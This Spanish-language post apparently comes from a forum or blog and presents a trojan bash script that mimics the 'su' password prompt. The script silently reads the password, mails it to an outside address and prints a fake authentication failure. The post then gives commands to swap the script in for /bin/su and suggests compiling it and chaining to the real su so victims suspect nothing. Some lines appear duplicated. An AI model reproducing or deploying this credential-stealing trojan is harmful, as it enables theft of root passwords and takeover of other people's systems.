Código:
#!/bin/bash
echo -n Password:
stty -echonl -echo
read VAR
echo $VAR | mail morsa@mi-dominio.com.ar
echo
echo su: Authentication failure
stty -echonl echo
echo -n Password:
stty -echonl -echo
read VAR
echo $VAR | mail morsa@mi-dominio.com.ar
echo
echo su: Authentication failure
stty -echonl echo
Damos permisos de ejecución:
Código:
# chmod a+x su.sh
Luego podemos reemplazarlo por el verdadero su:
Código:
# whereis su
su: /bin/su /usr/share/man/man1/su.1.gz
# mv /bin/su /bin/su.orig
# mv /root/su.sh /bin/su
su: /bin/su /usr/share/man/man1/su.1.gz
# mv /bin/su /bin/su.orig
# mv /root/su.sh /bin/su
Luego podemos convertir el script en bash a binario como en el siguiente enlace: http://www.redes-seguridad.com.ar/2011/06/convertir-un-script-en-bash-en-un.html
También podríamos agregar al final del script la invocación del verdadero su, para que no genere ninguna duda, o moverlo nuevamente.
Opiniones, sugerencias?